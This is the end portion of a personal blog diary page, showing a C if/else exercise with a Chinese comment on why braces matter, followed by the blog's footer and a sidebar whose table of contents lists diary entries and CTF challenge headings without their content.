</span><br><span class="line">	<span class="keyword">else</span> a++; b++;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;%d,%d&quot;</span>,a,b);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line"><span class="comment">//&#x8FD9;&#x91CC;&#x8F93;&#x51FA;&#x4F1A;&#x662F;2,3   &#x6211;&#x662F;&#x771F;&#x6CA1;&#x60F3;&#x5230;{}&#x8FD9;&#x4E2A;&#x62EC;&#x53F7;&#x7684;&#x7528;&#x5904;&#x8FD9;&#x4E48;&#x5927;&#xFF1B;&#x5982;&#x679C;if&#x8BED;&#x53E5;&#x4E0D;&#x52A0;&#xFF0C;&#x5219;else&#x627E;&#x4E0D;&#x5230;&#x76F8;&#x5E94;&#x7684;if&#x8BED;&#x53E5;&#xFF0C;&#x90A3;&#x4E48;&#x4F1A;&#x51FA;&#x73B0;&#x8BED;&#x6CD5;&#x62A5;&#x9519; &#x8FD9;&#x9053;&#x9898;&#x51FA;&#x81EA;P148 1.&#xFF08;10&#xFF09;</span></span><br></pre></td></tr></table></div></figure>

</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ END ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">Author: </span><span class="copyright-author__value"><a href="http://example.com">Kirsten Carton</a></span></div><div class="copyright-link"><span class="copyright-link__name">Link: </span><span class="copyright-link__value"><a href="http://example.com/2022/03/15/dairy/">http://example.com/2022/03/15/dairy/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">Copyright: </span><span class="copyright-notice__value">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> unless stating additionally</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://example.com/tags/daily/">daily</a></span></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2022/03/16/Daily-wp/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">Daily wp</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2022/03/13/beautiful-morning/"><span class="paginator-prev__text">Beautiful morning(en essay)</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">Catalog</span><span class="sidebar-nav-ov">Overview</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%9C%9F%E7%9A%84%E5%8F%AA%E6%98%AF%E4%B8%AA%E6%97%A5%E8%AE%B0"><span class="toc-number">1.</span> <span class="toc-text">
          真的只是个日记</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#2022-3-13"><span class="toc-number">1.1.</span> <span class="toc-text">
          2022.3.13</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#CTFshow-%E8%90%8C%E6%96%B0%E8%AE%A1%E5%88%92web"><span class="toc-number">2.</span> <span class="toc-text">
          CTFshow 萌新计划web</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#web-6"><span class="toc-number">2.1.</span> <span class="toc-text">
          web 6</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web-7"><span class="toc-number">2.2.</span> <span class="toc-text">
          web 7</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web-8"><span class="toc-number">2.3.</span> <span class="toc-text">
          web 8</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2022-3-14"><span class="toc-number">2.4.</span> <span class="toc-text">
          2022.3.14</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web9"><span class="toc-number">2.5.</span> <span class="toc-text">
          web9</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B2%A1%E9%94%99%E8%BF%99%E6%98%AF%E4%B8%80%E7%AF%87%E6%97%A5%E8%AE%B0"><span class="toc-number">3.</span> <span class="toc-text">
          没错这是一篇日记</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#web10"><span class="toc-number">3.1.</span> <span class="toc-text">
          web10</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Diary-Dairy-Dairy"><span class="toc-number">4.</span> <span class="toc-text">
          Diary Dairy Dairy</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Mar-16-2022"><span class="toc-number">4.1.</span> <span class="toc-text">
          Mar.16 2022</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#dairy-for-this-day"><span class="toc-number">4.2.</span> <span class="toc-text">
          dairy for this day</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Mar-17"><span class="toc-number">5.</span> <span class="toc-text">
          Mar.17</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#lots-of-special-matters"><span class="toc-number">5.1.</span> <span class="toc-text">
          lots of special matters</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Mar-20"><span class="toc-number">6.</span> <span class="toc-text">
          Mar.20</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#lots-of-deadline"><span class="toc-number">6.1.</span> <span class="toc-text">
          lots of deadline</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Mar-26"><span class="toc-number">7.</span> <span class="toc-text">
          Mar.26</span></a></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="images/imageone/avator one.jpg" alt="avatar"></div><p class="sidebar-ov-author__text">May you be faithful to yourself,live seriously and freely.</p></div><div class="sidebar-ov-social"><a class="sidebar-ov-social-item" href="https://github.com/KirstenCarton" target="_blank" rel="noopener" data-popover="Github" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-github"></i></span></a><a class="sidebar-ov-social-item" href="https://plus.google.com/" target="_blank" rel="noopener" data-popover="Google" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-google"></i></span></a><a class="sidebar-ov-social-item" href="https://twitter.com/" target="_blank" rel="noopener" data-popover="Twitter" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-twitter"></i></span></a><a class="sidebar-ov-social-item" href="https://youtube.com/" target="_blank" rel="noopener" data-popover="Youtube" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-youtube"></i></span></a></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">13</div><div class="sidebar-ov-state-item__name">Archives</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">5</div><div class="sidebar-ov-state-item__name">Categories</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">6</div><div class="sidebar-ov-state-item__name">Tags</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="Creative Commons" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">You have read </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2022</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>Kirsten Carton</span></div><div><span>Powered by <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a></span><span> v6.0.0</span><span class="footer__devider">|</span><span>Theme - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.6.2</span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="/js/utils.js?v=2.6.2"></script><script src="/js/stun-boot.js?v=2.6.2"></script><script src="/js/scroll.js?v=2.6.2"></script><script src="/js/header.js?v=2.6.2"></script><script src="/js/sidebar.js?v=2.6.2"></script></body></html>